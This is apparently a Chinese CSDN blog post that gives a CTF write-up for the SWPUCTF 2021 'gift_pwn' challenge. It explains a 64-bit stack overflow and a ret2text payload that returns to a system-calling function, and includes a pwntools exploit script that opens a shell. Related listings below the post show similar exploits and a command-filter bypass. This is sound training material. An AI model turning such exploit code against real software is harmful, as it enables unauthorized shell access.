NSSCTF刷题笔记pwn1——[SWPUCTF 2021 新生赛]gift_pwn

最新推荐文章于 2024-02-22 18:47:20 发布
最新推荐文章于 2024-02-22 18:47:20 发布
阅读量658 收藏 8
点赞数 7
分类专栏: pwn 文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45692883/article/details/135695102
版权

把附件下载下来拖入ida运行

映入眼帘的是

vuln可能存在漏洞的函数

gift题目中的主要函数

_system可以调用系统命令

我们直奔主题

有一个栈溢出,和一个调用系统bash的命令

不过要注意这是64位的程序

首先找到我们要返回的gift的地址 0x4005b6

其次是栈溢出的地址

ida有帮我们识别出来,距离rbp 16字节,我们要再加上我们的8个字节

最后加上我们的返回地址,是上面找到的gift的地址,payload就完成了

payload = b'a' * 0x10 + b'a' * 8 + p64(0x4005b6)

直接发送获取shell即可

exp代码如下

from pwn import *

p = remote('node4.anna.nssctf.cn',28304)

payload = b'a' * 0x10 + b'a' * 8 + p64(0x4005b6)

p.send(payload)
p.interactive()

qq_45692883
关注
  • 7
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
NSSCTF-SWPUCTF 2021 新生-web-wp
F1rstb100d
09-19 696
NSSCTF-SWPUCTF 2021 新生-web-wp
nssctf [SWPUCTF 2021 新生]gift_pwn
n1ght的博客
03-08 957
nssctfpwn的第二
[SWPUCTF 2021 新生]gift_pwn
m0_74355719的博客
11-29 447
【代码】[SWPUCTF 2021 新生]gift_pwn
SWPUCTF 2021 新生 gift_pwn
2301_79793667的博客
12-03 212
发现连接之后并没有什么反应,我们需要用ida进行查看。发现是64位的程序,那我们就用64位ida打开。/bin/sh开始的位置是4005B6。然后先进行nc连接,看看情况。有/bin/sh,追上去看看。然后运行,并查看flag。我们检查附件的保护方式。打开环境,并下载附件。定义了buf[16]
SWPU新生2021 Pwn部分WriteUp
mumuzi的博客
10-11 1983
第一波放 nc签到 不能有’cat’,‘ls’,’ ‘,‘cd’,‘echo’,’<’,’${IFS}’ 这很web 直接绕就行 tac$IFS$1flag gift_pwn ret2text from pwn import * p = remote('1.14.71.254','28057') p.sendline('a'*(0x10+8)+p64(0x4005b6)) p.interactive() whitegive_pwn ret2libc3 from pwn import * p =
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
赣网杯2021_pwn1.rar
12-11
赣网杯2021 pwn1 bin ctf
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_debug sudo ...
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
赣网杯2021_pwn2.rar
12-11
赣网杯2021 pwn1 bin ctf
NSSCTF Pwn Page 1 - 2
红叶的博客
03-14 1664
NSSCTF Pwn 第一页到第二页全部目解析。 了大概一个月的NSSCTF,对Pwn的理解更高了,虽然也没高到哪去。
[SWPUCTF 2021 新生]gift_F12的WP
yeah123_的博客
12-18 368
签到,打开F12即可获得。
CTF-1 cat’s gift
weixin_43607515的博客
05-25 824
目: [cat’s gift]时间: 2023-05-23难度: 2目来源: CATCTF目网站: 攻防世界。
i春秋 “百度杯”CTF比 十月场 Gift
include_heqile的博客
10-24 2476
https://www.ichunqiu.com/battalion?t=1&amp;amp;amp;amp;amp;r=0 进入目链接,是一张黑人问号图片: 直接使用burp suite抓包送到Repeater模块,检查发送和相应报文的HTTP头部字段,并未发现可疑字段,图片是base64编码,点击href链接,依然还是刚的页面,尝试更改请求方法,将GET更改为POST,响应如下: 如果了解过Django的话应该很容易看...
NSSCTF PWN (入门)
农夫果园好好喝的博客
09-18 1649
这不是欺负老实人嘛~
CTF学习笔记——ret2text
weixin_66578482的博客
12-10 365
ret2text 应该算是PWN里面比较简单的型了,这种型有个显著特征,就是会有个很明显的后门函数,也就是,我们只需要将我们的程序跳转到后门函数即可。不过我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。不过程序也可能会开启某些保护,我们需要想办法去绕过这些保护,这些我们就到后面来介绍。
[SWPUCTF 2021 新生]gift_F12
最新发布
bi_qi_bao_的博客
02-22 392
Ctrl + F 搜索 网页源码中的flag。我们直接F12打开网页源代码。它迷惑你傻傻等待时间。
PWN · ret2libc】[SWPUCTF 2021 新生]whitegive_pwn
Mr_Fmnwon的博客
05-31 584
和【PWN · ret2libc】[2021 鹤城杯]babyof_Mr_Fmnwon的博客-CSDN博客一样,是一道非常典型(指攻破过程)的ret2libc目。通过泄露got表、libc偏移等,构造system('/bin/sh')由于exp的思路在上面那篇博客讲的很清楚了,这里就不过多赘述,直接上exp。这一次对于ret有点理解了:gets/puts都放在return后,除了函数本身的调用返回外,还有调用函数处被返回(此时caller作为callee)所以可以填写返回地址,控制执行流。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值